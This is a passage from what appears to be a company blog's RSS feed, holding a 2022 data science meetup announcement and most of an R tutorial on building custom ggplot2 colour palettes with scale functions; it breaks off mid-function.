sponsors, listed at the end of this post!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-north-east-data-scientists-meetup"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-next-neds-meetup-july-14th-2022"&gt;Our next NEDS Meetup: July 14th 2022&lt;/h3&gt;
&lt;p&gt;The &lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/286235478/" rel="external"&gt;next NEDS meetup&lt;/a&gt; is coming up soon!
This time, we have some exciting talks from &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&amp;rsquo;&lt;/a&gt; &lt;a href="https://www.linkedin.com/in/myles-mitchell-4009aa98/" rel="external"&gt;Myles Mitchell&lt;/a&gt;, who will
talk about JR&amp;rsquo;s new tool, &lt;a href="https://diffify.com/" rel="external"&gt;Diffify&lt;/a&gt;, and
&lt;a href="https://www.linkedin.com/in/pennypegman/" rel="external"&gt;Penny Pegman&lt;/a&gt;, a Lead Data Scientist at the Department for Work and Pensions!&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.linkedin.com/in/jwalton93/" rel="external"&gt;Jack Walton&lt;/a&gt;, one of JR&amp;rsquo;s
Data Scientists and Trainers, will also deliver the pre-event workshop,
Plotting in Python: The Basics, a hands-on, interactive demonstration of
plotting with matplotlib in Python.&lt;/p&gt;
&lt;p&gt;For more details, or to register for the event, see the event page on
&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/events/286235478/" rel="external"&gt;Meetup.com&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="sponsorship"&gt;Sponsorship&lt;/h3&gt;
&lt;p&gt;This event is sponsored by:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;, an analytics company whose passion is data and machine learning.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data (NICD)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/north-east-data-scientists-meetup/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Custom colour palettes for {ggplot2}</title><link>https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/</link><pubDate>Thu, 23 Jun 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Choosing which colours to use in a plot is an important design decision.
A good choice of colour palette can highlight important aspects of your
data, but a poor choice can make it impossible to interpret correctly.
There are numerous colour palette R packages out there that are already
compatible with {ggplot2}. For example, the
&lt;a href="https://cran.r-project.org/web/packages/RColorBrewer/index.html" rel="external"&gt;{RColorBrewer}&lt;/a&gt;
or
&lt;a href="https://cran.r-project.org/web/packages/viridis/vignettes/intro-to-viridis.html" rel="external"&gt;{viridis}&lt;/a&gt;
packages are both widely used.&lt;/p&gt;
&lt;p&gt;If you regularly make plots at work, it’s great to have them be
consistent with your company’s branding. Maybe you’re already doing this
manually with the &lt;code&gt;scale_colour_manual()&lt;/code&gt; function in {ggplot2} but it’s
getting a bit tedious? Or maybe you just want your plots to look a
little bit prettier? This blog post will show you how to make a basic
colour palette that is compatible with {ggplot2}. It assumes you have
some experience with {ggplot2} - you know your geoms from your
aesthetics.&lt;/p&gt;
&lt;h2 id="building-a-colour-palette"&gt;Building a colour palette&lt;/h2&gt;
&lt;p&gt;To make a custom colour palette, there are three basic things you need
to do:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define your colours&lt;/li&gt;
&lt;li&gt;Generate a palette from your list of colours&lt;/li&gt;
&lt;li&gt;Create {ggplot2} functions to use your palette&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-custom-colour-palettes-for-ggplot2"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="defining-your-colours"&gt;Defining your colours&lt;/h3&gt;
&lt;p&gt;The process of adding colours is probably the simplest part of creating
colour palette functions. We need to create a named list where the names
are the names of our colour palettes. Each entry in the list is a vector
of the colours in that palette. Using lists (instead of data frames) is
essential because it allows us to create colour palettes with different
numbers of colours. It’s most common to define colours by their hex
codes, but we could also define colours by using their character names
e.g. &lt;code&gt;&amp;quot;blue&amp;quot;&lt;/code&gt;, or their RGB values using the &lt;code&gt;rgb()&lt;/code&gt; function. We’ll
stick to hex codes here.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cvi_colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; cvi_purples &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#381532&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4b1b42&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#5d2252&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#702963&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#833074&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#953784&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#a83e95&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; my_favourite_colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;#702963&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#637029&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;#296370&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here, we’ve kept the example small, and created a list called
&lt;code&gt;cvi_colours&lt;/code&gt; (short for corporate visual identity) with just two colour
palettes.&lt;/p&gt;
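&lt;p&gt;As a small illustration of the alternatives mentioned above, the sketch below defines colours by name and with &lt;code&gt;rgb()&lt;/code&gt;. The &lt;code&gt;other_colours&lt;/code&gt; list and its palette names are hypothetical, chosen only for this example, and are not used elsewhere in this post.&lt;/p&gt;

```r
# Hypothetical list, for illustration only; not part of cvi_colours.
other_colours = list(
  by_name = c("blue", "darkgreen", "orange"),
  by_rgb = c(
    rgb(112, 41, 99, maxColorValue = 255),  # same colour as "#702963"
    rgb(41, 99, 112, maxColorValue = 255)   # same colour as "#296370"
  )
)

# rgb() returns hex codes, so these entries are stored as strings too.
other_colours$by_rgb

# Each palette in the list can hold a different number of colours.
lengths(other_colours)
```

&lt;p&gt;Because &lt;code&gt;rgb()&lt;/code&gt; returns a hex string, code that later consumes the list should not need to know how each colour was originally specified.&lt;/p&gt;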
&lt;h3 id="generating-a-palette"&gt;Generating a palette&lt;/h3&gt;
&lt;p&gt;We need to create a function that generates an actual colour palette
from our simple list of colours. This function will take four arguments
to define:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the name of the colour palette we want to use,&lt;/li&gt;
&lt;li&gt;the list of colour palettes we want to extract our choice from,&lt;/li&gt;
&lt;li&gt;how many colours from it we want to use, and&lt;/li&gt;
&lt;li&gt;whether we want a discrete or continuous colour palette.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cvi_palettes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name, n, all_palettes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; cvi_colours, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;continuous&amp;#34;&lt;/span&gt;)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; palette &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; all_palettes[[name]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#d2a8ff;font-weight:bold"&gt;missing&lt;/span&gt;(n)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; n &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;length&lt;/span&gt;(palette)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;match.arg&lt;/span&gt;(type)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;switch&lt;/span&gt;(type,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; continuous &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; grDevices&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;colorRampPalette&lt;/span&gt;(palette)(n),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; discrete &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; palette[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;n]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;structure&lt;/span&gt;(out, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name, class &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;palette&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If a user doesn’t input the number of colours, by default we use all of
the colours in the palette. For a discrete palette, we simply take the
first &lt;code&gt;n&lt;/code&gt; colours from the chosen vector in &lt;code&gt;cvi_colours&lt;/code&gt;. However, for
continuous colour palettes, we need to use the &lt;code&gt;colorRampPalette()&lt;/code&gt;
function from {grDevices} to interpolate the given colours onto a
spectrum. The &lt;code&gt;switch()&lt;/code&gt; function then changes the output based on the
chosen type of palette.&lt;/p&gt;
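&lt;p&gt;To make the difference between the two palette types concrete, here is a minimal sketch that works on the three colours from &lt;code&gt;my_favourite_colours&lt;/code&gt; directly, rather than going through &lt;code&gt;cvi_palettes()&lt;/code&gt;. The variable names &lt;code&gt;colours&lt;/code&gt; and &lt;code&gt;ramp&lt;/code&gt; are assumptions made for illustration.&lt;/p&gt;

```r
colours = c("#702963", "#637029", "#296370")

# Discrete: take the first n colours exactly as they were defined.
colours[1:2]

# Asking for more colours than were defined pads the result with NA,
# so a discrete palette is limited by the number of defined colours.
colours[1:5]

# Continuous: colorRampPalette() returns a function that interpolates
# between the defined colours, so any number of colours can be requested.
ramp = grDevices::colorRampPalette(colours)
ramp(10)
```

&lt;p&gt;The padding with &lt;code&gt;NA&lt;/code&gt; is worth keeping in mind when a discrete palette is asked for more colours than it contains.&lt;/p&gt;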
&lt;p&gt;We don’t want to simply return a vector of colours from the
&lt;code&gt;cvi_palettes()&lt;/code&gt; function; we also want to add attributes using
the &lt;code&gt;structure()&lt;/code&gt; function. The first attribute is the name,
which we match to the name we gave the palette in &lt;code&gt;cvi_colours&lt;/code&gt;. The
second attribute is a &lt;code&gt;class&lt;/code&gt;, which here we’ll call
&lt;code&gt;palette&lt;/code&gt;. Assigning a class to the colour palette means we can
use S3 methods. S3 methods in R are a way of writing functions that do
different things for objects of different classes. S3 methods aren’t
really the topic of this post, but this &lt;a href="https://njtierney.github.io/r/missing%20data/rbloggers/2016/11/06/simple-s3-methods/" rel="external"&gt;blog
post&lt;/a&gt;
has a nice overview of them.&lt;/p&gt;
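&lt;p&gt;As a rough illustration of what the class makes possible, the sketch below defines a &lt;code&gt;print()&lt;/code&gt; method for objects of class &lt;code&gt;palette&lt;/code&gt; that draws the colours as vertical strips with the palette name on top. The method body is an assumption made for illustration and is not necessarily how the output in this post was produced.&lt;/p&gt;

```r
# Sketch of an S3 print method for objects of class "palette".
print.palette = function(x, ...) {
  n = length(x)
  # Shrink the plot margins and restore the old settings on exit.
  old = graphics::par(mar = c(0.5, 0.5, 0.5, 0.5))
  on.exit(graphics::par(old))
  # Draw one vertical strip per colour.
  graphics::image(1:n, 1, as.matrix(1:n), col = as.character(x),
                  xlab = "", ylab = "", xaxt = "n", yaxt = "n", bty = "n")
  # Write the palette name on a semi-transparent band across the middle.
  graphics::rect(0, 0.9, n + 1, 1.1,
                 col = grDevices::rgb(1, 1, 1, 0.8), border = NA)
  graphics::text((n + 1) / 2, 1, labels = attr(x, "name"), cex = 1)
  invisible(x)
}

# Build a palette object by hand so the example runs on its own.
pal = structure(c("#702963", "#637029", "#296370"),
                name = "my_favourite_colours", class = "palette")
print(pal)  # dispatches to print.palette()
```

&lt;p&gt;With a method like this in place, typing the name of a palette object at the console draws it instead of listing its hex codes.&lt;/p&gt;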
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;my_favourite_colours&amp;#34;&lt;/span&gt;, type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/favourite-palette-1.svg" title="Colour palette showing three vertical strips in pink, green, and blue with the word my favourite colours in the centre" alt="Colour palette showing three vertical strips in pink, green, and blue with the word my favourite colours in the centre" width="50%" style="display: block; margin: auto;" /&gt;
&lt;h3 id="creating-ggplot2-functions"&gt;Creating {ggplot2} functions&lt;/h3&gt;
&lt;p&gt;We need to define some functions so that {ggplot2} understands what to
do with our colour palettes. We’ll start by defining a simple {ggplot2}
plot that we’ll use to demonstrate our colour palettes later on.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;ggplot2&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;data.frame&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;A&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;B&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;C&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mapping &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0.05&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;0.95&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.justification &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;())
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Within {ggplot2}, there are two main ways to control the look of your
plot: (i) using &lt;code&gt;scale_*()&lt;/code&gt; functions to control the aesthetics that
have been mapped to your data; or (ii) using themes. Themes control the
aspects of your plot which do not depend on your data e.g. the
background colour. In this blog post, we’ll focus on the &lt;code&gt;scale_*()&lt;/code&gt;
functions.&lt;/p&gt;
&lt;p&gt;There are two aesthetics in {ggplot2} that involve colour: (i) &lt;code&gt;colour&lt;/code&gt;,
which changes the outline colour of a geom; and (ii) &lt;code&gt;fill&lt;/code&gt;, which
changes the inner colour of a geom. Note that not all geoms have both
&lt;code&gt;fill&lt;/code&gt; and &lt;code&gt;colour&lt;/code&gt; options e.g. &lt;code&gt;geom_line()&lt;/code&gt; is only affected by the
&lt;code&gt;colour&lt;/code&gt; aesthetic.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;black&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Fill&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;g &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_col&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; x), fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;white&amp;#34;&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Colour&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="https://www.jumpingrivers.com/blog/custom-colour-palettes-for-ggplot2/fill-colour-plot-1.svg" title="Two bars charts side by side. On the left the bars are coloured in pink, green, and blue. On the right, the outline is coloured in pink, green, and blue" alt="Two bars charts side by side. On the left the bars are coloured in pink, green, and blue. On the right, the outline is coloured in pink, green, and blue" width="50%" style="display: block; margin: auto;" /&gt;
&lt;p&gt;For each aesthetic, colour and fill, we need to handle both discrete
and continuous colour palettes. That means writing two functions per
aesthetic: one for discrete variables and one for continuous
variables. We’ll start by dealing with discrete variables. Here, we pass
our palette colours generated by &lt;code&gt;cvi_palettes()&lt;/code&gt; as the &lt;code&gt;values&lt;/code&gt;
argument in the &lt;code&gt;scale_colour_manual()&lt;/code&gt; function from {ggplot2}:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_colour_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The function that uses our colour palettes to change the fill colour is
almost identical: we simply change the function name and use
&lt;code&gt;scale_fill_manual()&lt;/code&gt; instead of &lt;code&gt;scale_colour_manual()&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_fill_cvi_d &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_manual&lt;/span&gt;(values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;discrete&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now for continuous variables. Continuous scales are similar but we use
the &lt;code&gt;scale_colour_gradientn()&lt;/code&gt; function instead of the manual scale
functions. This creates an n-colour gradient scale. We set the colours
used in the gradient scale using the &lt;code&gt;cvi_palettes()&lt;/code&gt; function we
defined earlier, and set the type as &lt;code&gt;continuous&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;scale_colour_cvi_c &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ggplot2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_colour_gradientn&lt;/span&gt;(colours &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cvi_palettes&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; name,
